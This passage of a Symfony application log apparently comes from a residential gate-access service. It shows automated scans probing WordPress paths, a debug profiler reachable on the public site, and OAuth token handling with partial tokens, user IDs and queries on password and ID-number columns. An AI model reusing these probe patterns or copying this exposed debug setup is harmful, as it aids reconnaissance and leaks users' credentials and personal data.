  190. [2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //test/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //test/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  191. [2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //media/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //media/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  192. [2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //wp2/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //wp2/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  193. [2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //site/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //site/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  194. [2025-12-16 00:47:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //cms/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //cms/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  195. [2025-12-16 00:47:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //sito/wp-includes/wlwmanifest.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //sito/wp-includes/wlwmanifest.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  196. [2025-12-16 00:48:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  197. [2025-12-16 00:55:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/pages/'%20+%20path%20+%20'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/pages/'%20+%20path%20+%20'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  198. [2025-12-16 00:56:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/js/pages/'%20+%20thumb%20+%20'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/js/pages/'%20+%20thumb%20+%20'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  199. [2025-12-16 00:59:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=events","method":"GET"} []
  200. [2025-12-16 00:59:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  201. [2025-12-16 01:00:03] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  202. [2025-12-16 01:00:04] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  203. [2025-12-16 01:00:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["2c804dceade8cb982747326a98 [...]"] []
  204. [2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
  205. [2025-12-16 01:00:04] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9981ff30bf4dfeecd417d0c922 [...]","3":"2025-12-16 01:30:04","4":"","5":394,"6":"[]"} []
  206. [2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
  207. [2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
  208. [2025-12-16 01:00:04] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"9213daee29b9093f3f0e3503a5 [...]","3":"2026-02-14 01:00:04","4":"","5":394,"6":"[]"} []
  209. [2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
  210. [2025-12-16 01:00:04] doctrine.DEBUG: "START TRANSACTION" [] []
  211. [2025-12-16 01:00:04] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"2c804dceade8cb982747326a98 [...]"] []
  212. [2025-12-16 01:00:04] doctrine.DEBUG: "COMMIT" [] []
  213. [2025-12-16 01:00:05] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  214. [2025-12-16 01:00:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  215. [2025-12-16 01:00:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  216. [2025-12-16 01:00:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  217. [2025-12-16 01:00:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  218. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  219. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  220. [2025-12-16 01:00:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  221. [2025-12-16 01:00:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  222. [2025-12-16 01:00:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  223. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["8521ca3b-69bb-4665-9c69-25 [...]"] []
  224. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [394,1] []
  225. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [394,1] []
  226. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  227. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  228. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [394,270] []
  229. [2025-12-16 01:00:05] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/0?order=desc","method":"GET"} []
  230. [2025-12-16 01:00:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  231. [2025-12-16 01:00:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  232. [2025-12-16 01:00:05] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  233. [2025-12-16 01:00:05] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  234. [2025-12-16 01:00:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  235. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  236. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  237. [2025-12-16 01:00:05] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  238. [2025-12-16 01:00:05] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  239. [2025-12-16 01:00:05] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  240. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  241. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
  242. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  243. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  244. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [270,1] []
  245. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
  246. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  247. [2025-12-16 01:00:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  248. [2025-12-16 01:00:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  249. [2025-12-16 01:00:07] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"1","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/1?order=desc","method":"GET"} []
  250. [2025-12-16 01:00:07] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  251. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  252. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  253. [2025-12-16 01:00:07] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  254. [2025-12-16 01:00:07] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  255. [2025-12-16 01:00:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  256. [2025-12-16 01:00:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  257. [2025-12-16 01:00:07] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  258. [2025-12-16 01:00:07] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  259. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
  260. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  261. [2025-12-16 01:00:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  262. [2025-12-16 01:00:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  263. [2025-12-16 01:00:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  264. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  265. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
  266. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
  267. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  268. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 10 [270,1] []
  269. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
  270. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
  271. [2025-12-16 01:00:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
  272. [2025-12-16 01:00:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  273. [2025-12-16 01:00:09] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a41ce4c3-29d5-4f1f-9146-ae339979667c/providers","method":"GET"} []
  274. [2025-12-16 01:00:09] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
